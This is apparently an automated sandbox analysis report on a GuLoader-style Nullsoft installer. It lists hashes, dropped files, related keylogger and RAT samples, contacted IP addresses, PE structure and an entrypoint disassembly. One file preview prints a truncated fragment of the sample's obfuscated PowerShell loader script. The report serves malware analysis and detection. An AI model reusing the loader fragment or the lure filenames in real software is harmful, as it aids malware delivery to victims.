54328bd36c14bd82ddaa0c04b25ed9ad	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3pwbTZtiDu.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.206 142.250.184.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll	TeamViewer_Setup.exe	Get hash	malicious	Unknown	Browse
	DHL TAX INVOICES - MARCH 2024.exe	Get hash	malicious	Remcos, GuLoader	Browse
	REF_17218_VV-0002.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO_00290292.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	teamviewer_Px-yDq1.exe	Get hash	malicious	Unknown	Browse
	teamviewer_Px-yDq1.exe	Get hash	malicious	Unknown	Browse
	SMGS-RCDU5010031.exe	Get hash	malicious	GuLoader, Remcos	Browse
	SMGS-RCDU5010031.exe	Get hash	malicious	GuLoader	Browse
	RC_S23_3274 Or_amento ADP 231019_5_5009.exe	Get hash	malicious	GuLoader, Remcos	Browse
	RC_S23_3274 Or_amento ADP 231019_5_5009.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cypj1un.3ss.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhsmv0st.b0g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjvycz4c.v0t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaojdow5.ud0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.140229856656103
Encrypted:	false
SSDEEP:	96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
MD5:	01E76FE9D2033606A48D4816BD9C2D9D
SHA1:	E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
SHA-256:	EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
SHA-512:	62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TeamViewer_Setup.exe, Detection: malicious, Browse Filename: DHL TAX INVOICES - MARCH 2024.exe, Detection: malicious, Browse Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse Filename: PO_00290292.exe, Detection: malicious, Browse Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	779915
Entropy (8bit):	7.773267127155475
Encrypted:	false
SSDEEP:	12288:0GCX77iIcM1saeQHgPVseMP/pmRR324xFcdW693tRLPHj6XOaho:qr75cgYQHgK3PxEBXi93tJPDUOB
MD5:	A1204C6A7FE28BAB5DB0E3240513A857
SHA1:	909F041EFC5859B43F547017085E3CF39A05A4FA
SHA-256:	8806CE311854FA80261E855453C07D30B43A24D413C65CDFAAE99024408BD6FF
SHA-512:	7D7C39189E6BC7C5339E08154DBBC45230B07FF55B62DADFE9828851276C0111AB76C143931D7A097395204CD2DF2F00D2647F5E6F0E3254999988635C409777
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..........................0............@..........................................0...............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\Cordts.for

Download File

Process:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
File Type:	data
Category:	dropped
Size (bytes):	362270
Entropy (8bit):	1.2455855418607977
Encrypted:	false
SSDEEP:	1536:8ISzVYclAygkWLgNhIaJiUYphjwPRryaqA:8bduh6hKUYp5aryaz
MD5:	9FA2163989C46356E859FEA0B8963C98
SHA1:	7C4909CBFBFBE47621E33E4FFCBDD07305BFB61A
SHA-256:	3F02D54A3EC1FECE8CC150F8C9DE04BA12D69A8A221AC97D64161E76E52DF25C
SHA-512:	39B7C5856903FEA66941551A89E936035C35A98C5B7587F34333626995F4D0A2A1B88E4CAC03865F9785BEF36E272875D84E3CCF221513D7139A4237085021F6
Malicious:	false
Preview:	.......c.....W.................X...{..................................c.......................................................>.................................^......y..................B..)....................................................X...........^.......................j.............}.................................%.................;....................................................................................................................f.....................................................................T........E.............................0......................>............................OJ..........................~........................~......G..............................i.s...........a...%........:...........?..........>v...........................................................................................a.,.............................."..................7..........................................).]............................P.................

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\Isoserine.neg

Download File

Process:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
File Type:	data
Category:	dropped
Size (bytes):	261410
Entropy (8bit):	1.2549428792982014
Encrypted:	false
SSDEEP:	768:Qwiy4uufWUw/8VP6g263Bho3fURSx13Q3pA/988PSEAyx6NQB1lir1f/R/qwV5iw:QDbZBhAUEoIGV/xh5DcPJsc/1si2
MD5:	37AEF816B4DE967A79095F52FE324B50
SHA1:	5F77040A1BF5EC66220083597D4FAA06F5FE1B9D
SHA-256:	3627F4556F8AC2105AB3DC8A5F0C149E1D8DE3520E50447F7F654DA939BA6946
SHA-512:	D65B2C9B80A825D3C77173E50D3A10F7FDAECCD58E2E385A095DDC2FB97554B8C6E027776333537A3B88226BDEC2A54A9B21E74E138556667E0B6C35491BC2A0
Malicious:	false
Preview:	..........................c..........................................................................................................L......................................0......................)....................1D......................R....\|.............................................................................c.........................Y..H............{......3...............s.........Z.................!.....{.......................$.............................................J........................,.............[......M...............;....................................................k..2.z...............................s.........R..............................J....g......................................................................................>.....................n....s.......................................................z...........?..................................4............r...............................................................................

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\harpedes.ham

Download File

Process:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
File Type:	data
Category:	dropped
Size (bytes):	452801
Entropy (8bit):	1.253535297499313
Encrypted:	false
SSDEEP:	1536:R7Kt/6RsOVcDyFtUkKQGef5fnB6vj/MuIqMas+dEgEcn03:DpVZBKsH6vFhMas+nn03
MD5:	36666AD5AFAD8972D1AC9D4BB141614D
SHA1:	2F50E39B78F2E1B8B751F61FDDCA0478B8A98274
SHA-256:	03325F7F88E997850F990A57E7DA4A4A9EDB0597E76110522D8DB6DA14F822E8
SHA-512:	51AF93E94F43711C7DDC75C08EBA8AD82E36799BAEC3F69572D0FEA349E3F9809D53D07EA6E4A430D46509FE88B923BC1EFDE1F8D414C9CEBBEF731D1C69F818
Malicious:	false
Preview:	.................................V..m....[.....................6.....................y....................................................i........................................l..................................1..r........Y.......\........@............p............................................................................................................................[.....?.................................................................................................u.'..........................................................a......)........}.....Z..........................................................................C............................B..............................F...........................................D.............H.............O...........~.....................................................F.......................n.D...........................................................N.................................................t.................7...

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206

Download File

Process:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4231), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73643
Entropy (8bit):	5.168473526958651
Encrypted:	false
SSDEEP:	1536:gCxW3WSOp9TSAX3mrJVmm0nvexpoJ4t4buPrPZ68DJmd9xu1fVBrHxgMw1:gN3WpFX3sHmDvexpU46aPdJSyBy
MD5:	ED7E63CF5634B14FE01D4DE956824D88
SHA1:	1F765A37046506FC4125BE6841C907AD14D6D241
SHA-256:	1AD13D6915FD2F28864EC1D26A89E3C3918BBEAE7575CEC876FE12A184C66D47
SHA-512:	FFCC939991C5C8030342F7975635D9C54D08A2D45FAE760663E5888DC5C5552AC05082F87905D0E4167B13512BC2FB8BA5E5291CF87C8941E29E5C7B3A75E861
Malicious:	true
Preview:	$Zoonomist=$Clavatin;........$Grundtallene = @'.Oprykn . Slikke$FucoidaUOotidssbMi geleuAftnensnkonkur dSv ngeneT.yreostSjllandhFravig eUr varsd Ang,opsKrigskurLokummer Go,meuiGlucolit latiniaDi.kofitL ctucaeBalkjoldSkrivem8 brahma4 Legali=Nyta.rs$UnderfuSHngeparoOvernouvMaskinaeSmokewosRestablaProjektlKvldendeCo.hurns Algaro;Revsere.Soarin f peratruUdvekslnAfspistcKatarint D,dekai semafooBloomlenNon ult GelatiGCalceuseBlgmrkenKvalitenM nimumeKuperermUnsalvabDrslgerl,nrighjd VanillnHammochi AbsorpnVerdensgTraadvvsMisties Skyderi( P ragr$SpradsyT AnomaliJudic tlPredisgbOrangiseBlkhusedG,ftigseVariforlUnde gis eforesePakkentnTabposi2Udtyndi2Sungreh3Gibbsit, Forkva$CalabooT CulturiEje doml CholecbDoyl ykeExtradodOmtnksoeDe lasml BufonisCatamarefluidenn oneuph2Squawer2Ze nhan3mumiesefHesperifPseudohrTeametpiIntercon R,tzesgTritorrs NonpunmfamilieiProtoxyd Tilganlti ingbeMangledrHordary)Arbejds Rev cat{Depotti.Gymnast.Foret.m$ ubilumCGenstanrmistrsty Meso ep MealmetDrifts oSlgtsrezTillb s

C:\Users\user\AppData\Local\neoimpressionism\Dandyism.Par

Download File

Process:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
File Type:	data
Category:	dropped
Size (bytes):	324401
Entropy (8bit):	7.6544441224377096
Encrypted:	false
SSDEEP:	6144:Q8rDPoMQ6Z+lcNDJyuZZ3PuIQGVSCm4r7UtJjeg5IGFmIwn7HdX:Qmkm+lDa3PkkK4rgtcd7x
MD5:	F6A7F77B3A470E3BEFBE2F11DB0C4ACC
SHA1:	0D7503D0065AE76FCAE637B750F2EE51370E136C
SHA-256:	562BC5352F4411D89743B1492098F7EAB76E312645FD4458A1C55DBA106DBF7C
SHA-512:	E29FA29ED411E4236F7F2EDE87886E84E0A1BEA7E9FF5DBAE6CF795CD85A823058B4E2EC19097244190CA3383E93C5D49519D392FB8533F2C1908C11A2730177
Malicious:	false
Preview:	................__..SS............................""".................y............./........7../......0..."".................11.............................^^^^.......................lll.........4.......,,.]..........!..............qqqqqqqq...........N.....JJ..........___.M.#.G.................>>>......eeeeee..............?.............y..........s..._..EE....`````.........o..DDDDD........VV................w..d...).A...t.....1........C............................Q..lll..............=...................!!.......................j...................O........M............................SSSSS.j.....*..................QQQ.S.%%........////.............................r........1..77..........D.==...............k..b....7................................................p..6666666............=...............................-......................:....yyyy.]..................`.........TTTTT..))...D.......AA...............................JJ...]..\|\|\|\|..kkkkk..........mmm..........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.773267127155475
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4Vx2rUlb0f.exe
File size:	779'915 bytes
MD5:	a1204c6a7fe28bab5db0e3240513a857
SHA1:	909f041efc5859b43f547017085e3cf39a05a4fa
SHA256:	8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff
SHA512:	7d7c39189e6bc7c5339e08154dbbc45230b07ff55b62dadfe9828851276c0111ab76c143931d7a097395204cd2df2f00d2647f5e6f0e3254999988635c409777
SSDEEP:	12288:0GCX77iIcM1saeQHgPVseMP/pmRR324xFcdW693tRLPHj6XOaho:qr75cgYQHgK3PxEBXi93tJPDUOB
TLSH:	E1F4E0B3CF396923ED4498B2E42F1DF7977448728655A8033152BD37F9249A6EE0920F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@

File Icon


Icon Hash:	b2b3aeb696aefe9e

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e2a592076b17ef8bfb48b7e03965a3fc

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007FAB28B6D403h
push ebx
call 00007FAB28B70544h
cmp eax, ebx
je 00007FAB28B6D3F9h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007FAB28B704BEh
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FAB28B6D3DCh
push ebp
push 00000009h
call 00007FAB28B70516h
push 00000007h
call 00007FAB28B7050Fh
mov dword ptr [00434EE4h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [00434F98h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h
push 00433EE0h
call 00007FAB28B700F8h
call dword ptr [004080A8h]
mov ebp, 0043F000h
push eax
push ebp
call 00007FAB28B700E6h
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2f8e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637b	0x6400	967d0e18ece4b8dcc63ec9d544660136	False	0.671484375	data	6.484796945043301	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14b0	0x1600	d6b0bc2db2de2a3dd996fda6539cef0e	False	0.4401633522727273	data	5.033673390997287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2afd8	0x600	2aa587c909999ca52be17d0f1ffbd186	False	0.5188802083333334	data	4.039551377217298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2f8e8	0x2fa00	0d35228bed9e6f3e44cf465cb8cafb1c	False	0.35265440452755903	data	6.469094045775567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x53388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.19277179699514965
RT_ICON	0x63bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.21263401303342444
RT_ICON	0x6d058	0x74dc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9871306324374917
RT_ICON	0x74538	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.2557301293900185
RT_ICON	0x799c0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.2701936702881436
RT_ICON	0x7dbe8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.333298755186722
RT_ICON	0x80190	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.44183864915572235
RT_ICON	0x81238	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.5352459016393443
RT_ICON	0x81bc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.6604609929078015
RT_DIALOG	0x82028	0x100	data	English	United States	0.5234375
RT_DIALOG	0x82128	0xf8	data	English	United States	0.6370967741935484
RT_DIALOG	0x82220	0xa0	data	English	United States	0.6125
RT_DIALOG	0x822c0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x82320	0x84	data	English	United States	0.946969696969697
RT_VERSION	0x823a8	0x1fc	data	English	United States	0.5413385826771654
RT_MANIFEST	0x825a8	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
